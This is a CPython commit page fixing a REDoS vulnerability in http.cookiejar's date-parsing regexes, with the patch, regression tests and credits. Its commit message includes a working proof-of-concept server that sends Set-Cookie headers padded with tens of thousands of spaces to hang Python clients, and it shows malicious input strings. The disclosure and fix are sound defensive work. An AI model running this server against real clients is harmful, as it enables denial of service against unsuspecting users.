Skip to content

Commit

Permalink
bpo-38804: Fix REDoS in http.cookiejar (pythonGH-17157)
Browse files Browse the repository at this point in the history
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
  • Loading branch information
bcaller authored and miss-islington committed Nov 22, 2019
1 parent c3cd0de commit 0cbc802
Show file tree
Hide file tree
Showing 4 changed files with 27 additions and 6 deletions.
18 changes: 12 additions & 6 deletions Lib/http/cookiejar.py
Expand Up @@ -214,10 +214,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz):
(?::(\d\d))? # optional seconds
)? # optional clock
\s*
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
(?:
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone
\s*
)?
(?:
\(\w+\) # ASCII representation of timezone in parens.
\s*
(?:\(\w+\))? # ASCII representation of timezone in parens.
\s*$""", re.X | re.ASCII)
)?$""", re.X | re.ASCII)
def http2time(text):
"""Returns time in seconds since epoch of time represented by a string.
Expand Down Expand Up @@ -287,9 +291,11 @@ def http2time(text):
(?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional)
)? # optional clock
\s*
([-+]?\d\d?:?(:?\d\d)?
|Z|z)? # timezone (Z is "zero meridian", i.e. GMT)
\s*$""", re.X | re. ASCII)
(?:
([-+]?\d\d?:?(:?\d\d)?
|Z|z) # timezone (Z is "zero meridian", i.e. GMT)
\s*
)?$""", re.X | re. ASCII)
def iso2time(text):
"""
As for http2time, but parses the ISO 8601 formats:
Expand Down
13 changes: 13 additions & 0 deletions Lib/test/test_http_cookiejar.py
Expand Up @@ -123,6 +123,13 @@ def test_http2time_garbage(self):
"http2time(%s) is not None\n"
"http2time(test) %s" % (test, http2time(test)))

def test_http2time_redos_regression_actually_completes(self):
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
# If we regress to cubic complexity, this test will take a very long time to succeed.
# If fixed, it should complete within a fraction of a second.
http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5))
http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5))

def test_iso2time(self):
def parse_date(text):
return time.gmtime(iso2time(text))[:6]
Expand Down Expand Up @@ -180,6 +187,12 @@ def test_iso2time_garbage(self):
self.assertIsNone(iso2time(test),
"iso2time(%r)" % test)

def test_iso2time_performance_regression(self):
# If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed.
# If fixed, it should complete within a fraction of a second.
iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6))
iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6))


class HeaderTests(unittest.TestCase):

Expand Down
1 change: 1 addition & 0 deletions Misc/ACKS
Expand Up @@ -250,6 +250,7 @@ Zach Byrne
Vedran Čačić
Nicolas Cadou
Jp Calderone
Ben Caller
Arnaud Calmettes
Daniel Calvelo
Tony Campbell
Expand Down
@@ -0,0 +1 @@
Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller.

0 comments on commit 0cbc802

Please sign in to comment.